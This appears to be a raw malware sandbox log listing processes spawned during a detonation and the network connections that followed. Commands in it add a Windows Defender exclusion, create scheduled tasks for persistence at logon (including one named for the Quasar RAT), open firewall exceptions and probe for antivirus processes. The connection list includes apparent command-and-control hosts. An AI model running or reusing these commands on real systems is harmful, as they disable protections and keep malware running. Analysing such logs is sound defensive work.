"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
C:\Users\Admin\AppData\Local\Temp\a\mod.exe
"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\Server.exe
"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "d3f4f0ef-3603-4e14-afcf-b85b775e7c43" "System"
C:\Users\Admin\AppData\Local\Temp\a\Client.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\a\jij.exe
"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SdKVUC2UF3Oy.bat" "
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xnAULEnVoqrp.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaS5Lj59HSh3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PZb2XeKo2Ov.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvCM9DTMx1PL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHugTaed4e2t.bat" "
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"
C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
"C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhjzBeMnS37F.bat" "
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDT8T7iTruRo.bat" "
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\plRuUThQ7DUV.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xxys2Xb0KHAy.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c md 634977
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SysWOW64\extrac32.exe
extrac32 /Y /E Gtk
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CcSCQtjZT2g.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y0xNmMCFk8yV.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\SysWOW64\findstr.exe
findstr /V "Constitution" Wagon
C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X54ekAcmKbIv.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gubQos3ySnWn.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HtYfsW3vai5h.bat" "
C:\Windows\system32\chcp.com
chcp 65001
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| DE | 5.252.155.72:80 | 5.252.155.72 | tcp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.173.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| US | 8.8.8.8:53 | 240.159.208.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.155.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | maerchen-beat-frei.ch | udp |
| US | 45.42.212.91:443 | maerchen-beat-frei.ch | tcp |
| CH | 95.183.50.117:80 | 95.183.50.117 | tcp |
| US | 8.8.8.8:53 | 91.212.42.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.50.183.95.in-addr.arpa | udp |
| DE | 185.208.159.240:56001 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | fizzysu.sbs | udp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.75.5.in-addr.arpa | udp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| US | 8.8.8.8:53 | plunder.dedyn.io | udp |
| TR | 216.9.224.66:5000 | plunder.dedyn.io | tcp |
| HK | 121.127.231.166:80 | 121.127.231.166 | tcp |
| US | 8.8.8.8:53 | 226.183.138.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.224.9.216.in-addr.arpa | udp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 166.231.127.121.in-addr.arpa | udp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| CN | 124.221.100.215:80 | | tcp |
| CY | 213.133.94.133:4444 | | tcp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.89:80 | e5.o.lencr.org | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.44.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | bash.mywire.org | udp |
| US | 192.188.88.248:2404 | bash.mywire.org | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bash1.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash1.accesscam.org | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| JP | 8.209.212.26:7777 | 8.209.212.26 | tcp |
| US | 8.8.8.8:53 | 26.212.209.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 10.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| CN | 120.26.164.174:8088 | tcp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mail.mindfulinvoice.online | udp |
| US | 199.127.63.127:8041 | mail.mindfulinvoice.online | tcp |
| US | 8.8.8.8:53 | 127.63.127.199.in-addr.arpa | udp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 207.231.111.48:80 | 207.231.111.48 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 48.111.231.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| RU | 185.215.113.16:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | thefashionist.top | udp |
| US | 104.21.80.1:443 | thefashionist.top | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | impolitewearr.biz | udp |
| US | 8.8.8.8:53 | toppyneedus.biz | udp |
| US | 172.67.149.66:443 | toppyneedus.biz | tcp |
| US | 8.8.8.8:53 | 1.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.149.67.172.in-addr.arpa | udp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | lightdeerysua.biz | udp |
| US | 8.8.8.8:53 | suggestyuoz.biz | udp |
| US | 8.8.8.8:53 | hoursuhouy.biz | udp |
| US | 8.8.8.8:53 | mixedrecipew.biz | udp |
| HK | 45.192.96.63:6001 | 45.192.96.63 | tcp |
| US | 8.8.8.8:53 | affordtempyo.biz | udp |
| US | 8.8.8.8:53 | pleasedcfrown.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | yuriy-gagarin.com | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 104.21.82.94:443 | yuriy-gagarin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 63.96.192.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.82.21.104.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| RU | 185.215.113.16:80 | tcp | |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.86.108.55:7771 | tcp | |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | 55.108.86.172.in-addr.arpa | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
